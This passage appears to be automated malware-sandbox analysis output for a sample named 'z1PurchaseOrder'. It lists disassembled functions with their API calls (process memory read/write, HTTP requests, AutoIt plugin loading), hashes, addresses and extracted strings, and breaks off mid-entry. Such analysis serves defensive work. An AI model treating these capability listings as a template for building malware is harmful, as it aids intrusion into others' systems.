                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                        • String ID:
                                        • API String ID: 132634196-0
                                        • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                        • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                        • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                        • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                        APIs
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                        • __getptd_noexit.LIBCMT ref: 00415620
                                        • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                        • __freeptd.LIBCMT ref: 0041563B
                                        • ExitThread.KERNEL32 ref: 00415643
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 3798957060-0
                                        • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                        • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                        • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                        • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                        APIs
                                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                        • ___set_flsgetvalue.LIBCMT ref: 00415690
                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                        • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                        • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                        • ExitThread.KERNEL32 ref: 004156BD
                                        • __freefls@4.LIBCMT ref: 004156D9
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                        • String ID:
                                        • API String ID: 1537469427-0
                                        • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                        • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                        • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                        • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _malloc
                                        • String ID: Default$|k
                                        • API String ID: 1579825452-2254895183
                                        • Opcode ID: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                        • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                        • Opcode Fuzzy Hash: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                        • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID: '$[$h
                                        • API String ID: 2931989736-1224472061
                                        • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                        • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                        • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                        • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _strncmp
                                        • String ID: >$R$U
                                        • API String ID: 909875538-1924298640
                                        • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                        • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                        • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                        • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                        APIs
                                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                        • CoInitialize.OLE32(00000000), ref: 0046CE18
                                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                        • CoUninitialize.OLE32 ref: 0046CE50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                        • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                        • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                        • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 176396367-557222456
                                        • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                        • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                        • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                        • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                        APIs
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                        • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                        • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopyInit_malloc
                                        • String ID: 4RH
                                        • API String ID: 2981388473-749298218
                                        • Opcode ID: 886d72268d4c4b31cd7e9b97dec5c8ab100e14167db6bca7b584ef53709687b2
                                        • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                        • Opcode Fuzzy Hash: 886d72268d4c4b31cd7e9b97dec5c8ab100e14167db6bca7b584ef53709687b2
                                        • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                        APIs
                                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                        • __wcsnicmp.LIBCMT ref: 0046681A
                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                        • String ID: LPT$HH
                                        • API String ID: 3035604524-2728063697
                                        • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                        • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                        • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                        • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                        APIs
                                          • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                          • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$MemoryProcess$ReadWrite
                                        • String ID: @
                                        • API String ID: 4055202900-2766056989
                                        • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                        • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                        • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                        • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset_wcslen
                                        • String ID: |
                                        • API String ID: 915713708-2343686810
                                        • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                        • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                        • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                        • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                        • HttpQueryInfoW.WININET ref: 0044A892
                                          • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3705125965-3916222277
                                        • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                        • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                        • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                        • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                        • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                        • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                        • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                        • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: AU3_GetPluginDetails
                                        • API String ID: 145871493-4132174516
                                        • Opcode ID: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                        • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                        • Opcode Fuzzy Hash: 86e4c61e32d2ed878dfd7fe720ec64e92d9a8cb9aafa3c38a6749b64446316ec
                                        • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                        APIs
                                        • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 3375834691-2298589950
                                        • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                        • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                        • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                        • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                        • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                        • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                        • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                        • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                        • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: HH
                                        • API String ID: 2507767853-2761332787
                                        • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
